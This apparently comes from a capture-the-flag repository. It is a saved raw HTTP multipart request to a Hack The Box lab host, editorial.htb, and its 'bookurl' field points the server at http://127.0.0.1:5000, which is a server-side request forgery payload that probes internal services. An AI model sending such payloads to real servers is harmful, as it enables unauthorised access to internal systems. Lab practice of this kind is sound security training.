aboutsummaryrefslogtreecommitdiff
path: root/editorial/request.txt
blob: 9e4f88f5cde72413211bee925b2203c34a2f8f05 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Length: 305
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4sG5ro4zgTRwZZA2
Accept: */*
Origin: http://editorial.htb
Referer: http://editorial.htb/upload
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundary4sG5ro4zgTRwZZA2
Content-Disposition: form-data; name="bookurl"

http://127.0.0.1:5000
------WebKitFormBoundary4sG5ro4zgTRwZZA2
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary4sG5ro4zgTRwZZA2--